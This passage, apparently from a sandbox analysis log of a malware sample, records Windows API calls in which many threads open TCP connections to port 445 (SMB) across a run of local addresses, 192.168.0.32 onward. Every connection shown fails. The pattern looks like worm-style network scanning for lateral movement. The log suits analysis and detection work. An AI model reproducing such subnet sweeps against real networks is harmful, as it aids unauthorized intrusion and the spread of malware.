GetCurrentThreadId () returned 0xe84 [0164.743] CloseHandle (hObject=0x4ac) returned 1 [0164.743] GetCurrentThreadId () returned 0xe84 [0164.743] Sleep (dwMilliseconds=0x0) [0164.750] _endthreadex (_ReturnCode=0x0) Thread: id = 828 os_tid = 0xed0 [0143.355] GetCurrentThreadId () returned 0xed0 [0143.355] GetCurrentThreadId () returned 0xed0 [0143.355] GetCurrentThreadId () returned 0xed0 [0143.355] _errno () returned 0x28b03d0 [0143.355] wcslen (_String="192.168.0.32") returned 0xc [0143.355] wcstombs (in: _Dest=0x28a9da0, _Source="192.168.0.32", _MaxCount=0xd | out: _Dest="192.168.0.32") returned 0xc [0143.355] htons (hostshort=0x1bd) returned 0xbd01 [0143.355] inet_addr (cp="192.168.0.32") returned 0x2000a8c0 [0143.355] socket (af=2, type=1, protocol=0) returned 0x4d0 [0143.355] connect (s=0x4d0, name=0x74ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.32"), namelen=16) returned -1 [0164.743] GetCurrentThreadId () returned 0xed0 [0164.743] GetCurrentThreadId () returned 0xed0 [0164.743] longjmp () [0164.743] GetCurrentThreadId () returned 0xed0 [0164.743] CloseHandle (hObject=0x4c0) returned 1 [0164.743] GetCurrentThreadId () returned 0xed0 [0164.743] Sleep (dwMilliseconds=0x0) [0164.750] _endthreadex (_ReturnCode=0x0) Thread: id = 829 os_tid = 0xb20 [0143.357] GetCurrentThreadId () returned 0xb20 [0143.357] GetCurrentThreadId () returned 0xb20 [0143.357] GetCurrentThreadId () returned 0xb20 [0143.357] _errno () returned 0x28b05f8 [0143.358] wcslen (_String="192.168.0.33") returned 0xc [0143.358] wcstombs (in: _Dest=0x28b8d80, _Source="192.168.0.33", _MaxCount=0xd | out: _Dest="192.168.0.33") returned 0xc [0143.358] htons (hostshort=0x1bd) returned 0xbd01 [0143.358] inet_addr (cp="192.168.0.33") returned 0x2100a8c0 [0143.358] socket (af=2, type=1, protocol=0) returned 0x4e4 [0143.359] connect (s=0x4e4, name=0x773fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.33"), namelen=16) returned -1 [0164.743] GetCurrentThreadId () returned 0xb20 [0164.743] GetCurrentThreadId () returned 0xb20 [0164.743] longjmp () [0164.743] GetCurrentThreadId () returned 0xb20 [0164.743] CloseHandle (hObject=0x4d4) returned 1 [0164.743] GetCurrentThreadId () returned 0xb20 [0164.743] Sleep (dwMilliseconds=0x0) [0164.751] _endthreadex (_ReturnCode=0x0) Thread: id = 830 os_tid = 0xe88 [0143.360] GetCurrentThreadId () returned 0xe88 [0143.360] GetCurrentThreadId () returned 0xe88 [0143.360] GetCurrentThreadId () returned 0xe88 [0143.360] _errno () returned 0x28b0820 [0143.360] wcslen (_String="192.168.0.34") returned 0xc [0143.360] wcstombs (in: _Dest=0x28b4d60, _Source="192.168.0.34", _MaxCount=0xd | out: _Dest="192.168.0.34") returned 0xc [0143.360] htons (hostshort=0x1bd) returned 0xbd01 [0143.360] inet_addr (cp="192.168.0.34") returned 0x2200a8c0 [0143.360] socket (af=2, type=1, protocol=0) returned 0x4f8 [0143.360] connect (s=0x4f8, name=0x797fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.34"), namelen=16) returned -1 [0164.743] GetCurrentThreadId () returned 0xe88 [0164.743] GetCurrentThreadId () returned 0xe88 [0164.743] longjmp () [0164.743] GetCurrentThreadId () returned 0xe88 [0164.743] CloseHandle (hObject=0x4e8) returned 1 [0164.743] GetCurrentThreadId () returned 0xe88 [0164.743] Sleep (dwMilliseconds=0x0) [0164.751] _endthreadex (_ReturnCode=0x0) Thread: id = 831 os_tid = 0xb88 [0143.390] GetCurrentThreadId () returned 0xb88 [0143.390] GetCurrentThreadId () returned 0xb88 [0143.390] GetCurrentThreadId () returned 0xb88 [0143.390] _errno () returned 0x28b0a48 [0143.390] wcslen (_String="192.168.0.35") returned 0xc [0143.390] wcstombs (in: _Dest=0x28b5d68, _Source="192.168.0.35", _MaxCount=0xd | out: _Dest="192.168.0.35") returned 0xc [0143.390] htons (hostshort=0x1bd) returned 0xbd01 [0143.390] inet_addr (cp="192.168.0.35") returned 0x2300a8c0 [0143.390] socket (af=2, type=1, protocol=0) returned 0x504 [0143.391] connect (s=0x504, name=0x7bbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.35"), namelen=16) returned -1 [0164.743] GetCurrentThreadId () returned 0xb88 [0164.743] GetCurrentThreadId () returned 0xb88 [0164.743] longjmp () [0164.744] GetCurrentThreadId () returned 0xb88 [0164.744] CloseHandle (hObject=0x284) returned 1 [0164.744] GetCurrentThreadId () returned 0xb88 [0164.744] Sleep (dwMilliseconds=0x0) [0164.752] _endthreadex (_ReturnCode=0x0) Thread: id = 832 os_tid = 0xb0 [0143.392] GetCurrentThreadId () returned 0xb0 [0143.392] GetCurrentThreadId () returned 0xb0 [0143.392] GetCurrentThreadId () returned 0xb0 [0143.392] _errno () returned 0x28b0e98 [0143.392] wcslen (_String="192.168.0.36") returned 0xc [0143.392] wcstombs (in: _Dest=0x28b6d70, _Source="192.168.0.36", _MaxCount=0xd | out: _Dest="192.168.0.36") returned 0xc [0143.392] htons (hostshort=0x1bd) returned 0xbd01 [0143.392] inet_addr (cp="192.168.0.36") returned 0x2400a8c0 [0143.392] socket (af=2, type=1, protocol=0) returned 0x518 [0143.393] connect (s=0x518, name=0x7dffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.36"), namelen=16) returned -1 [0164.744] GetCurrentThreadId () returned 0xb0 [0164.744] GetCurrentThreadId () returned 0xb0 [0164.744] longjmp () [0164.744] GetCurrentThreadId () returned 0xb0 [0164.744] CloseHandle (hObject=0x508) returned 1 [0164.744] GetCurrentThreadId () returned 0xb0 [0164.744] Sleep (dwMilliseconds=0x0) [0164.752] _endthreadex (_ReturnCode=0x0) Thread: id = 833 os_tid = 0xefc [0143.394] GetCurrentThreadId () returned 0xefc [0143.394] GetCurrentThreadId () returned 0xefc [0143.394] GetCurrentThreadId () returned 0xefc [0143.394] _errno () returned 0x28b0c70 [0143.394] wcslen (_String="192.168.0.37") returned 0xc [0143.394] wcstombs (in: _Dest=0x28b7d78, _Source="192.168.0.37", _MaxCount=0xd | out: _Dest="192.168.0.37") returned 0xc [0143.394] htons (hostshort=0x1bd) returned 0xbd01 [0143.394] inet_addr (cp="192.168.0.37") returned 0x2500a8c0 [0143.394] socket (af=2, type=1, protocol=0) returned 0x52c [0143.394] connect (s=0x52c, name=0x803fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.37"), namelen=16) returned -1 [0164.744] GetCurrentThreadId () returned 0xefc [0164.744] GetCurrentThreadId () returned 0xefc [0164.744] longjmp () [0164.744] GetCurrentThreadId () returned 0xefc [0164.744] CloseHandle (hObject=0x51c) returned 1 [0164.744] GetCurrentThreadId () returned 0xefc [0164.744] Sleep (dwMilliseconds=0x0) [0164.753] _endthreadex (_ReturnCode=0x0) Thread: id = 834 os_tid = 0xf18 [0143.396] GetCurrentThreadId () returned 0xf18 [0143.396] GetCurrentThreadId () returned 0xf18 [0143.396] GetCurrentThreadId () returned 0xf18 [0143.396] _errno () returned 0x28b10c0 [0143.396] wcslen (_String="192.168.0.38") returned 0xc [0143.396] wcstombs (in: _Dest=0x28b9d88, _Source="192.168.0.38", _MaxCount=0xd | out: _Dest="192.168.0.38") returned 0xc [0143.396] htons (hostshort=0x1bd) returned 0xbd01 [0143.396] inet_addr (cp="192.168.0.38") returned 0x2600a8c0 [0143.396] socket (af=2, type=1, protocol=0) returned 0x540 [0143.396] connect (s=0x540, name=0x827fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.38"), namelen=16) returned -1 [0164.744] GetCurrentThreadId () returned 0xf18 [0164.744] GetCurrentThreadId () returned 0xf18 [0164.744] longjmp () [0164.744] GetCurrentThreadId () returned 0xf18 [0164.744] CloseHandle (hObject=0x530) returned 1 [0164.744] GetCurrentThreadId () returned 0xf18 [0164.744] Sleep (dwMilliseconds=0x0) [0164.753] _endthreadex (_ReturnCode=0x0) Thread: id = 835 os_tid = 0xf10 [0143.398] GetCurrentThreadId () returned 0xf10 [0143.398] GetCurrentThreadId () returned 0xf10 [0143.398] GetCurrentThreadId () returned 0xf10 [0143.398] _errno () returned 0x28b1510 [0143.398] wcslen (_String="192.168.0.39") returned 0xc [0143.398] wcstombs (in: _Dest=0x28bad90, _Source="192.168.0.39", _MaxCount=0xd | out: _Dest="192.168.0.39") returned 0xc [0143.398] htons (hostshort=0x1bd) returned 0xbd01 [0143.398] inet_addr (cp="192.168.0.39") returned 0x2700a8c0 [0143.398] socket (af=2, type=1, protocol=0) returned 0x554 [0143.398] connect (s=0x554, name=0x84bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.39"), namelen=16) returned -1 [0164.744] GetCurrentThreadId () returned 0xf10 [0164.744] GetCurrentThreadId () returned 0xf10 [0164.744] longjmp () [0164.744] GetCurrentThreadId () returned 0xf10 [0164.744] CloseHandle (hObject=0x544) returned 1 [0164.744] GetCurrentThreadId () returned 0xf10 [0164.744] Sleep (dwMilliseconds=0x0) [0164.754] _endthreadex (_ReturnCode=0x0) Thread: id = 836 os_tid = 0xec0 [0143.399] GetCurrentThreadId () returned 0xec0 [0143.399] GetCurrentThreadId () returned 0xec0 [0143.399] GetCurrentThreadId () returned 0xec0 [0143.399] _errno () returned 0x28b12e8 [0143.399] wcslen (_String="192.168.0.40") returned 0xc [0143.399] wcstombs (in: _Dest=0x28b3d58, _Source="192.168.0.40", _MaxCount=0xd | out: _Dest="192.168.0.40") returned 0xc [0143.399] htons (hostshort=0x1bd) returned 0xbd01 [0143.399] inet_addr (cp="192.168.0.40") returned 0x2800a8c0 [0143.399] socket (af=2, type=1, protocol=0) returned 0x568 [0143.400] connect (s=0x568, name=0x86ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.40"), namelen=16) returned -1 [0164.745] GetCurrentThreadId () returned 0xec0 [0164.745] GetCurrentThreadId () returned 0xec0 [0164.745] longjmp () [0164.745] GetCurrentThreadId () returned 0xec0 [0164.745] CloseHandle (hObject=0x558) returned 1 [0164.745] GetCurrentThreadId () returned 0xec0 [0164.745] Sleep (dwMilliseconds=0x0) [0164.754] _endthreadex (_ReturnCode=0x0) Thread: id = 837 os_tid = 0xf14 [0143.402] GetCurrentThreadId () returned 0xf14 [0143.402] GetCurrentThreadId () returned 0xf14 [0143.402] GetCurrentThreadId () returned 0xf14 [0143.402] _errno () returned 0x28b1738 [0143.402] wcslen (_String="192.168.0.41") returned 0xc [0143.402] wcstombs (in: _Dest=0x28bcda0, _Source="192.168.0.41", _MaxCount=0xd | out: _Dest="192.168.0.41") returned 0xc [0143.402] htons (hostshort=0x1bd) returned 0xbd01 [0143.402] inet_addr (cp="192.168.0.41") returned 0x2900a8c0 [0143.402] socket (af=2, type=1, protocol=0) returned 0x57c [0143.402] connect (s=0x57c, name=0x893fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.41"), namelen=16) returned -1 [0164.745] GetCurrentThreadId () returned 0xf14 [0164.745] GetCurrentThreadId () returned 0xf14 [0164.745] longjmp () [0164.745] GetCurrentThreadId () returned 0xf14 [0164.745] CloseHandle (hObject=0x56c) returned 1 [0164.745] GetCurrentThreadId () returned 0xf14 [0164.745] Sleep (dwMilliseconds=0x0) [0164.755] _endthreadex (_ReturnCode=0x0) Thread: id = 838 os_tid = 0xf00 [0143.418] GetCurrentThreadId () returned 0xf00 [0143.418] GetCurrentThreadId () returned 0xf00 [0143.418] GetCurrentThreadId () returned 0xf00 [0143.418] _errno () returned 0x28b1b88 [0143.418] wcslen (_String="192.168.0.42") returned 0xc [0143.418] wcstombs (in: _Dest=0x28bdda8, _Source="192.168.0.42", _MaxCount=0xd | out: _Dest="192.168.0.42") returned 0xc [0143.419] htons (hostshort=0x1bd) returned 0xbd01 [0143.419] inet_addr (cp="192.168.0.42") returned 0x2a00a8c0 [0143.419] socket (af=2, type=1, protocol=0) returned 0x594 [0143.419] connect (s=0x594, name=0x8b7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.42"), namelen=16) returned -1 [0164.745] GetCurrentThreadId () returned 0xf00 [0164.745] GetCurrentThreadId () returned 0xf00 [0164.745] longjmp () [0164.745] GetCurrentThreadId () returned 0xf00 [0164.745] CloseHandle (hObject=0x580) returned 1 [0164.745] GetCurrentThreadId () returned 0xf00 [0164.745] Sleep (dwMilliseconds=0x0) [0164.755] _endthreadex (_ReturnCode=0x0) Thread: id = 839 os_tid = 0xeb8 [0143.454] GetCurrentThreadId () returned 0xeb8 [0143.454] GetCurrentThreadId () returned 0xeb8 [0143.454] GetCurrentThreadId () returned 0xeb8 [0143.480] _errno () returned 0x28b1db0 [0143.480] wcslen (_String="192.168.0.43") returned 0xc [0143.480] wcstombs (in: _Dest=0x28bedb0, _Source="192.168.0.43", _MaxCount=0xd | out: _Dest="192.168.0.43") returned 0xc [0143.480] htons (hostshort=0x1bd) returned 0xbd01 [0143.480] inet_addr (cp="192.168.0.43") returned 0x2b00a8c0 [0143.480] socket (af=2, type=1, protocol=0) returned 0x5ac [0143.480] connect (s=0x5ac, name=0x8dbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.43"), namelen=16) returned -1 [0164.745] GetCurrentThreadId () returned 0xeb8 [0164.745] GetCurrentThreadId () returned 0xeb8 [0164.745] longjmp () [0164.745] GetCurrentThreadId () returned 0xeb8 [0164.745] CloseHandle (hObject=0x598) returned 1 [0164.745] GetCurrentThreadId () returned 0xeb8 [0164.745] Sleep (dwMilliseconds=0x0) [0164.756] _endthreadex (_ReturnCode=0x0) Thread: id = 840 os_tid = 0xf1c [0143.483] GetCurrentThreadId () returned 0xf1c [0143.483] GetCurrentThreadId () returned 0xf1c [0143.483] GetCurrentThreadId () returned 0xf1c [0143.483] _errno () returned 0x28b1960 [0143.483] wcslen (_String="192.168.0.44") returned 0xc [0143.483] wcstombs (in: _Dest=0x28bfdb8, _Source="192.168.0.44", _MaxCount=0xd | out: _Dest="192.168.0.44") returned 0xc [0143.483] htons (hostshort=0x1bd) returned 0xbd01 [0143.483] inet_addr (cp="192.168.0.44") returned 0x2c00a8c0 [0143.483] socket (af=2, type=1, protocol=0) returned 0x5c0 [0143.483] connect (s=0x5c0, name=0x8fffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.44"), namelen=16) returned -1 [0164.745] GetCurrentThreadId () returned 0xf1c [0164.745] GetCurrentThreadId () returned 0xf1c [0164.745] longjmp () [0164.745] GetCurrentThreadId () returned 0xf1c [0164.745] CloseHandle (hObject=0x5b0) returned 1 [0164.746] GetCurrentThreadId () returned 0xf1c [0164.746] Sleep (dwMilliseconds=0x0) [0164.757] _endthreadex (_ReturnCode=0x0) Thread: id = 841 os_tid = 0xf0c [0143.485] GetCurrentThreadId () returned 0xf0c [0143.485] GetCurrentThreadId () returned 0xf0c [0143.485] GetCurrentThreadId () returned 0xf0c [0143.485] _errno () returned 0x28b2428 [0143.485] wcslen (_String="192.168.0.45") returned 0xc [0143.485] wcstombs (in: _Dest=0x28c0dc0, _Source="192.168.0.45", _MaxCount=0xd | out: _Dest="192.168.0.45") returned 0xc [0143.485] htons (hostshort=0x1bd) returned 0xbd01 [0143.485] inet_addr (cp="192.168.0.45") returned 0x2d00a8c0 [0143.485] socket (af=2, type=1, protocol=0) returned 0x5d4 [0143.485] connect (s=0x5d4, name=0x923fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.45"), namelen=16) returned -1 [0164.746] GetCurrentThreadId () returned 0xf0c [0164.746] GetCurrentThreadId () returned 0xf0c [0164.746] longjmp () [0164.746] GetCurrentThreadId () returned 0xf0c [0164.746] CloseHandle (hObject=0x5c4) returned 1 [0164.746] GetCurrentThreadId () returned 0xf0c [0164.746] Sleep (dwMilliseconds=0x0) [0164.757] _endthreadex (_ReturnCode=0x0) Thread: id = 842 os_tid = 0xe74 [0143.487] GetCurrentThreadId () returned 0xe74 [0143.487] GetCurrentThreadId () returned 0xe74 [0143.487] GetCurrentThreadId () returned 0xe74 [0143.487] _errno () returned 0x28b1fd8 [0143.487] wcslen (_String="192.168.0.46") returned 0xc [0143.487] wcstombs (in: _Dest=0x28c1dc8, _Source="192.168.0.46", _MaxCount=0xd | out: _Dest="192.168.0.46") returned 0xc [0143.487] htons (hostshort=0x1bd) returned 0xbd01 [0143.487] inet_addr (cp="192.168.0.46") returned 0x2e00a8c0 [0143.487] socket (af=2, type=1, protocol=0) returned 0x5e8 [0143.487] connect (s=0x5e8, name=0x947fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.46"), namelen=16) returned -1 [0164.746] GetCurrentThreadId () returned 0xe74 [0164.746] GetCurrentThreadId () returned 0xe74 [0164.746] longjmp () [0164.746] GetCurrentThreadId () returned 0xe74 [0164.746] CloseHandle (hObject=0x5d8) returned 1 [0164.746] GetCurrentThreadId () returned 0xe74 [0164.746] Sleep (dwMilliseconds=0x0) [0164.758] _endthreadex (_ReturnCode=0x0) Thread: id = 843 os_tid = 0xce0 [0143.489] GetCurrentThreadId () returned 0xce0 [0143.489] GetCurrentThreadId () returned 0xce0 [0143.489] GetCurrentThreadId () returned 0xce0 [0143.489] _errno () returned 0x28b2aa0 [0143.489] wcslen (_String="192.168.0.47") returned 0xc [0143.489] wcstombs (in: _Dest=0x28c2dd0, _Source="192.168.0.47", _MaxCount=0xd | out: _Dest="192.168.0.47") returned 0xc [0143.489] htons (hostshort=0x1bd) returned 0xbd01 [0143.490] inet_addr (cp="192.168.0.47") returned 0x2f00a8c0 [0143.490] socket (af=2, type=1, protocol=0) returned 0x5fc [0143.490] connect (s=0x5fc, name=0x96bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.47"), namelen=16) returned -1 [0164.746] GetCurrentThreadId () returned 0xce0 [0164.746] GetCurrentThreadId () returned 0xce0 [0164.746] longjmp () [0164.746] GetCurrentThreadId () returned 0xce0 [0164.746] CloseHandle (hObject=0x5ec) returned 1 [0164.746] GetCurrentThreadId () returned 0xce0 [0164.746] Sleep (dwMilliseconds=0x0) [0164.758] _endthreadex (_ReturnCode=0x0) Thread: id = 844 os_tid = 0xce4 [0143.492] GetCurrentThreadId () returned 0xce4 [0143.492] GetCurrentThreadId () returned 0xce4 [0143.492] GetCurrentThreadId () returned 0xce4 [0143.492] _errno () returned 0x28b2cc8 [0143.492] wcslen (_String="192.168.0.48") returned 0xc [0143.492] wcstombs (in: _Dest=0x28bbd98, _Source="192.168.0.48", _MaxCount=0xd | out: _Dest="192.168.0.48") returned 0xc [0143.492] htons (hostshort=0x1bd) returned 0xbd01 [0143.492] inet_addr (cp="192.168.0.48") returned 0x3000a8c0 [0143.492] socket (af=2, type=1, protocol=0) returned 0x610 [0143.492] connect (s=0x610, name=0x98ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.48"), namelen=16) returned -1 [0164.746] GetCurrentThreadId () returned 0xce4 [0164.746] GetCurrentThreadId () returned 0xce4 [0164.746] longjmp () [0164.746] GetCurrentThreadId () returned 0xce4 [0164.746] CloseHandle (hObject=0x600) returned 1 [0164.746] GetCurrentThreadId () returned 0xce4 [0164.746] Sleep (dwMilliseconds=0x0) [0164.759] _endthreadex (_ReturnCode=0x0) Thread: id = 845 os_tid = 0xce8 [0143.494] GetCurrentThreadId () returned 0xce8 [0143.494] GetCurrentThreadId () returned 0xce8 [0143.494] GetCurrentThreadId () returned 0xce8 [0143.494] _errno () returned 0x28b2650 [0143.494] wcslen (_String="192.168.0.49") returned 0xc [0143.494] wcstombs (in: _Dest=0x28c4de0, _Source="192.168.0.49", _MaxCount=0xd | out: _Dest="192.168.0.49") returned 0xc [0143.494] htons (hostshort=0x1bd) returned 0xbd01 [0143.494] inet_addr (cp="192.168.0.49") returned 0x3100a8c0 [0143.494] socket (af=2, type=1, protocol=0) returned 0x624 [0143.494] connect (s=0x624, name=0x9b3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.49"), namelen=16) returned -1 [0164.747] GetCurrentThreadId () returned 0xce8 [0164.747] GetCurrentThreadId () returned 0xce8 [0164.747] longjmp () [0164.747] GetCurrentThreadId () returned 0xce8 [0164.747] CloseHandle (hObject=0x614) returned 1 [0164.747] GetCurrentThreadId () returned 0xce8 [0164.747] Sleep (dwMilliseconds=0x0) [0164.759] _endthreadex (_ReturnCode=0x0) Thread: id = 846 os_tid = 0xcf4 [0143.496] GetCurrentThreadId () returned 0xcf4 [0143.496] GetCurrentThreadId () returned 0xcf4 [0143.496] GetCurrentThreadId () returned 0xcf4 [0143.496] _errno () returned 0x28b3118 [0143.496] wcslen (_String="192.168.0.50") returned 0xc [0143.496] wcstombs (in: _Dest=0x28c5de8, _Source="192.168.0.50", _MaxCount=0xd | out: _Dest="192.168.0.50") returned 0xc [0143.496] htons (hostshort=0x1bd) returned 0xbd01 [0143.496] inet_addr (cp="192.168.0.50") returned 0x3200a8c0 [0143.496] socket (af=2, type=1, protocol=0) returned 0x638 [0143.496] connect (s=0x638, name=0x9d7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.50"), namelen=16) returned -1 [0164.747] GetCurrentThreadId () returned 0xcf4 [0164.747] GetCurrentThreadId () returned 0xcf4 [0164.747] longjmp () [0164.747] GetCurrentThreadId () returned 0xcf4 [0164.747] CloseHandle (hObject=0x628) returned 1 [0164.747] GetCurrentThreadId () returned 0xcf4 [0164.747] Sleep (dwMilliseconds=0x0) [0164.760] _endthreadex (_ReturnCode=0x0) Thread: id = 847 os_tid = 0xcf8 [0143.498] GetCurrentThreadId () returned 0xcf8 [0143.498] GetCurrentThreadId () returned 0xcf8 [0143.498] GetCurrentThreadId () returned 0xcf8 [0143.498] _errno () returned 0x28b3340 [0143.498] wcslen (_String="192.168.0.51") returned 0xc [0143.498] wcstombs (in: _Dest=0x28c6df0, _Source="192.168.0.51", _MaxCount=0xd | out: _Dest="192.168.0.51") returned 0xc [0143.498] htons (hostshort=0x1bd) returned 0xbd01 [0143.498] inet_addr (cp="192.168.0.51") returned 0x3300a8c0 [0143.498] socket (af=2, type=1, protocol=0) returned 0x64c [0143.498] connect (s=0x64c, name=0x9fbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.51"), namelen=16) returned -1 [0164.747] GetCurrentThreadId () returned 0xcf8 [0164.747] GetCurrentThreadId () returned 0xcf8 [0164.747] longjmp () [0164.747] GetCurrentThreadId () returned 0xcf8 [0164.747] CloseHandle (hObject=0x63c) returned 1 [0164.747] GetCurrentThreadId () returned 0xcf8 [0164.747] Sleep (dwMilliseconds=0x0) [0164.760] _endthreadex (_ReturnCode=0x0) Thread: id = 848 os_tid = 0xcec [0143.500] GetCurrentThreadId () returned 0xcec [0143.500] GetCurrentThreadId () returned 0xcec [0143.500] GetCurrentThreadId () returned 0xcec [0143.500] _errno () returned 0x28b3568 [0143.500] wcslen (_String="192.168.0.52") returned 0xc [0143.500] wcstombs (in: _Dest=0x28c7df8, _Source="192.168.0.52", _MaxCount=0xd | out: _Dest="192.168.0.52") returned 0xc [0143.500] htons (hostshort=0x1bd) returned 0xbd01 [0143.500] inet_addr (cp="192.168.0.52") returned 0x3400a8c0 [0143.500] socket (af=2, type=1, protocol=0) returned 0x660 [0143.500] connect (s=0x660, name=0xa1ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.52"), namelen=16) returned -1 [0164.747] GetCurrentThreadId () returned 0xcec [0164.747] GetCurrentThreadId () returned 0xcec [0164.747] longjmp () [0164.747] GetCurrentThreadId () returned 0xcec [0164.747] CloseHandle (hObject=0x650) returned 1 [0164.747] GetCurrentThreadId () returned 0xcec [0164.747] Sleep (dwMilliseconds=0x0) [0164.761] _endthreadex (_ReturnCode=0x0) Thread: id = 849 os_tid = 0xcf0 [0143.502] GetCurrentThreadId () returned 0xcf0 [0143.502] GetCurrentThreadId () returned 0xcf0 [0143.502] GetCurrentThreadId () returned 0xcf0 [0143.502] _errno () returned 0x28b3790 [0143.502] wcslen (_String="192.168.0.53") returned 0xc [0143.502] wcstombs (in: _Dest=0x28c8e00, _Source="192.168.0.53", _MaxCount=0xd | out: _Dest="192.168.0.53") returned 0xc [0143.502] htons (hostshort=0x1bd) returned 0xbd01 [0143.502] inet_addr (cp="192.168.0.53") returned 0x3500a8c0 [0143.502] socket (af=2, type=1, protocol=0) returned 0x674 [0143.502] connect (s=0x674, name=0xa43fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.53"), namelen=16) returned -1 [0164.747] GetCurrentThreadId () returned 0xcf0 [0164.747] GetCurrentThreadId () returned 0xcf0 [0164.747] longjmp () [0164.747] GetCurrentThreadId () returned 0xcf0 [0164.747] CloseHandle (hObject=0x664) returned 1 [0164.747] GetCurrentThreadId () returned 0xcf0 [0164.747] Sleep (dwMilliseconds=0x0) [0164.761] _endthreadex (_ReturnCode=0x0) Thread: id = 850 os_tid = 0xf08 [0143.504] GetCurrentThreadId () returned 0xf08 [0143.504] GetCurrentThreadId () returned 0xf08 [0143.504] GetCurrentThreadId () returned 0xf08 [0143.504] _errno () returned 0x28b39b8 [0143.504] wcslen (_String="192.168.0.54") returned 0xc [0143.504] wcstombs (in: _Dest=0x28c9e08, _Source="192.168.0.54", _MaxCount=0xd | out: _Dest="192.168.0.54") returned 0xc [0143.504] htons (hostshort=0x1bd) returned 0xbd01 [0143.504] inet_addr (cp="192.168.0.54") returned 0x3600a8c0 [0143.504] socket (af=2, type=1, protocol=0) returned 0x688 [0143.504] connect (s=0x688, name=0xa67fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.54"), namelen=16) returned -1 [0164.748] GetCurrentThreadId () returned 0xf08 [0164.748] GetCurrentThreadId () returned 0xf08 [0164.748] longjmp () [0164.748] GetCurrentThreadId () returned 0xf08 [0164.748] CloseHandle (hObject=0x678) returned 1 [0164.748] GetCurrentThreadId () returned 0xf08 [0164.748] Sleep (dwMilliseconds=0x0) [0164.762] _endthreadex (_ReturnCode=0x0) Thread: id = 851 os_tid = 0xcdc [0143.505] GetCurrentThreadId () returned 0xcdc [0143.505] GetCurrentThreadId () returned 0xcdc [0143.505] GetCurrentThreadId () returned 0xcdc [0143.505] _errno () returned 0x2898590 [0143.505] wcslen (_String="192.168.0.55") returned 0xc [0143.505] wcstombs (in: _Dest=0x28cae10, _Source="192.168.0.55", _MaxCount=0xd | out: _Dest="192.168.0.55") returned 0xc [0143.505] htons (hostshort=0x1bd) returned 0xbd01 [0143.505] inet_addr (cp="192.168.0.55") returned 0x3700a8c0 [0143.506] socket (af=2, type=1, protocol=0) returned 0x69c [0143.506] connect (s=0x69c, name=0xa8bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.55"), namelen=16) returned -1 [0164.748] GetCurrentThreadId () returned 0xcdc [0164.748] GetCurrentThreadId () returned 0xcdc [0164.748] longjmp () [0164.748] GetCurrentThreadId () returned 0xcdc [0164.748] CloseHandle (hObject=0x68c) returned 1 [0164.748] GetCurrentThreadId () returned 0xcdc [0164.748] Sleep (dwMilliseconds=0x0) [0164.762] _endthreadex (_ReturnCode=0x0) Thread: id = 852 os_tid = 0xef0 [0143.508] GetCurrentThreadId () returned 0xef0 [0143.508] GetCurrentThreadId () returned 0xef0 [0143.509] GetCurrentThreadId () returned 0xef0 [0143.509] _errno () returned 0x28d79f0 [0143.509] wcslen (_String="192.168.0.56") returned 0xc [0143.509] wcstombs (in: _Dest=0x28c3dd8, _Source="192.168.0.56", _MaxCount=0xd | out: _Dest="192.168.0.56") returned 0xc [0143.513] htons (hostshort=0x1bd) returned 0xbd01 [0143.513] inet_addr (cp="192.168.0.56") returned 0x3800a8c0 [0143.513] socket (af=2, type=1, protocol=0) returned 0x6b0 [0143.516] connect (s=0x6b0, name=0xaaffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.56"), namelen=16) returned -1 [0164.748] GetCurrentThreadId () returned 0xef0 [0164.748] GetCurrentThreadId () returned 0xef0 [0164.748] longjmp () [0164.748] GetCurrentThreadId () returned 0xef0 [0164.748] CloseHandle (hObject=0x6a0) returned 1 [0164.748] GetCurrentThreadId () returned 0xef0 [0164.748] Sleep (dwMilliseconds=0x0) [0164.763] _endthreadex (_ReturnCode=0x0) Thread: id = 853 os_tid = 0xf4c [0143.517] GetCurrentThreadId () returned 0xf4c [0143.517] GetCurrentThreadId () returned 0xf4c [0143.517] GetCurrentThreadId () returned 0xf4c [0143.517] _errno () returned 0x28d7c18 [0143.517] wcslen (_String="192.168.0.57") returned 0xc [0143.517] wcstombs (in: _Dest=0x28cbe18, _Source="192.168.0.57", _MaxCount=0xd | out: _Dest="192.168.0.57") returned 0xc [0143.517] htons (hostshort=0x1bd) returned 0xbd01 [0143.517] inet_addr (cp="192.168.0.57") returned 0x3900a8c0 [0143.517] socket (af=2, type=1, protocol=0) returned 0x6c4 [0143.518] connect (s=0x6c4, name=0xad3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.57"), namelen=16) returned -1 [0164.929] GetCurrentThreadId () returned 0xf4c [0164.929] GetCurrentThreadId () returned 0xf4c [0164.929] longjmp () [0164.929] GetCurrentThreadId () returned 0xf4c [0164.929] CloseHandle (hObject=0x6b4) returned 1 [0164.929] GetCurrentThreadId () returned 0xf4c [0164.929] Sleep (dwMilliseconds=0x0) [0164.956] _endthreadex (_ReturnCode=0x0) Thread: id = 854 os_tid = 0xa1c [0143.520] GetCurrentThreadId () returned 0xa1c [0143.520] GetCurrentThreadId () returned 0xa1c [0143.520] GetCurrentThreadId () returned 0xa1c [0143.520] _errno () returned 